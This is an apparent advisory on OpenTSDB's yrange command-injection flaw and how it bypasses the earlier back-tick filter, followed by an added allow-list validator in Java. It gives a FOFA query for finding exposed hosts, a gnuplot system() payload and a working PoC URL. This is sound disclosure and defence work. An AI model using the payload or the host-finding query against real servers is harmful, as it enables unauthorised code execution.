A remote code execution vulnerability was found in the yrange parameter of OpenTSDB 2.4.0 and earlier (other parameters may also be vulnerable).
fofa:title="Opentsdb" ||body="opentsdb_header.jpg"
In CVE-2018-12972 the command injection used back-ticks (o=%60ls%60). Upstream introduced the following check to filter them; it can now be bypassed again, because it only denies back-ticks rather than validating what the parameter may contain.

/src/tsd/GraphHandler.java:

    private static String popParam(final Map<String, List<String>> querystring,
                                   final String param) {
      final List<String> params = querystring.remove(param);
      if (params == null) {
        return null;
      }
      final String given = params.get(params.size() - 1);
      // TODO - far from perfect, should help a little.
      if (given.contains("`") || given.contains("%60") ||
          given.contains("`")) {
        throw new BadRequestException("Parameter " + param + " contained a "
            + "back-tick. That's a no-no.");
      }
      return given;
    }
Bypass Payload:
[33:system('touch/tmp/poc.txt')]
PoC:
http://opentsdbhost.local/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('touch/tmp/poc.txt')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
The gnuplot file that OpenTSDB creates in the temp directory looks like this:
set term png small size 1516,644
set xdata time
set timefmt "%s"
if (GPVAL_VERSION < 4.6) set xtics rotate; else set xtics rotate right
set output "/tmp/d705ba5b.png"
set xrange ["972086400":"1603641404"]
set format x "%Y/%m/%d"
set grid
set style data linespoint
set key right box
set ylabel ""
set yrange [33:system('touch /tmp/poc.txt')]
plot "/tmp/d705ba5b_0.dat" using 1:2 title "sys.cpu.nice{host=web01, dc=lga}"
When OpenTSDB runs mygnuplot.sh, poc.txt is written to the temp directory.
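The root cause is that popParam is a deny-list: it strips back-ticks, but gnuplot's own system() function needs none, so any value reaching "set yrange" unchanged is still an injection point. The allow-list counterpart below is an added example, not OpenTSDB's code: it accepts a range parameter only when it matches the plain numeric "[min:max]" grammar (bounds may be empty or "*"), and rejects everything else before it can be written into the script. The class name, the BadRequestException stand-in and the sample inputs are assumptions made here; the grammar covers numeric yrange values only, not the quoted time bounds OpenTSDB emits for xrange.

```java
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

// Added example (not OpenTSDB's code): allow-list validation for range
// parameters that GraphHandler copies into the generated gnuplot script.
public class RangeParamValidator {

    // One range bound we are willing to accept: empty, '*', or a plain
    // decimal number. Identifiers, quotes and parentheses never match,
    // so a call such as system(...) cannot reach the script.
    private static final String BOUND =
        "(?:\\*|-?\\d+(?:\\.\\d+)?(?:[eE][-+]?\\d+)?)?";

    // Whole parameter: "[min:max]" with optional whitespace, nothing else.
    private static final Pattern RANGE =
        Pattern.compile("^\\[\\s*" + BOUND + "\\s*:\\s*" + BOUND + "\\s*\\]$");

    // Hypothetical stand-in for the BadRequestException used on the page.
    public static final class BadRequestException extends RuntimeException {
        BadRequestException(String msg) { super(msg); }
    }

    /** Returns true when the value matches the numeric range grammar. */
    public static boolean isSafeRange(String value) {
        return value != null && RANGE.matcher(value).matches();
    }

    /**
     * Allow-list counterpart to the page's popParam: removes the parameter
     * from the query map and returns its last value, or throws when that
     * value is not a plain numeric range.
     */
    public static String popRangeParam(Map<String, List<String>> querystring,
                                       String param) {
        List<String> params = querystring.remove(param);
        if (params == null) {
            return null;
        }
        String given = params.get(params.size() - 1);
        if (!isSafeRange(given)) {
            throw new BadRequestException("Parameter " + param
                + " is not a numeric range of the form [min:max].");
        }
        return given;
    }

    public static void main(String[] args) {
        // Constructed inputs: legitimate ranges plus the page's bypass value.
        String[] samples = {
            "[0:100]", "[*:*]", "[:50]", "[-1.5:2e3]",
            "[33:system('touch /tmp/poc.txt')]",  // page's payload: rejected
            "[0:100]; set output '/tmp/x'",       // trailing statement: rejected
            "[`id`:1]",                           // back-tick: rejected
        };
        for (String s : samples) {
            System.out.printf("%-40s -> %s%n", s,
                isSafeRange(s) ? "accepted" : "rejected");
        }

        // Same check applied the way popParam is used on the query map.
        Map<String, List<String>> qs = new HashMap<>();
        qs.put("yrange", Arrays.asList("[33:system('touch /tmp/poc.txt')]"));
        try {
            popRangeParam(qs, "yrange");
        } catch (BadRequestException e) {
            System.out.println("popRangeParam: " + e.getMessage());
        }
    }
}
```

The design choice is to describe what a valid value looks like rather than enumerate bad characters: gnuplot accepts function calls, nested quoting and further statements in a range expression, so a deny-list would have to track the whole gnuplot grammar, while the allow-list only has to describe the handful of shapes the graph endpoint legitimately needs.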
ref: